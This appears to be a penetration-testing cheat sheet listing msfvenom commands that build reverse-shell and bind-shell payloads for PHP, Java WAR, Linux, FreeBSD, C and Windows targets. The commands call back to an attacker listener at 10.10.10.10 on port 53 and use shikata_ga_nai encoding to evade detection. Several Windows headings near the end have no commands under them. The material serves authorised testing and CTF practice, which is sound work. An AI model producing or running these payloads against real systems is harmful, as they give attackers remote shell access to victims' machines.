Msfvenom Payloads

Payload creation using msfvenom

PHP Reverse Shell

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=53 -f raw -o shell.php

Java War Reverse Shell

msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f war -o shell.war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f war -o shell.war

Linux Bind Shell

msfvenom -p linux/x86/shell_bind_tcp LPORT=53 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai

Linux Binary

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f elf -o shell.elf
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf

FreeBSD Reverse Shell

msfvenom -p bsd/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f elf -o shell.elf

C Reverse Shell

msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -e x86/shikata_ga_nai -f c

Windows Non-Staged Reverse Shell

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -e x86/shikata_ga_nai -f exe -o non_staged.exe

Windows Staged (Meterpreter) Reverse Shell

Windows Staged (Meterpreter) PHP Reverse Shell

Windows Python Reverse Shell

Windows ASP Reverse Shell

Windows ASPX Reverse Shell

Windows Javascript Reverse Shell with NOPS

Windows Powershell Reverse Shell

Windows Reverse Shell excluding bad characters

Windows x64 Reverse Shell

Windows x86 Reverse Shell

DLL Hijacking

Last updated

Was this helpful?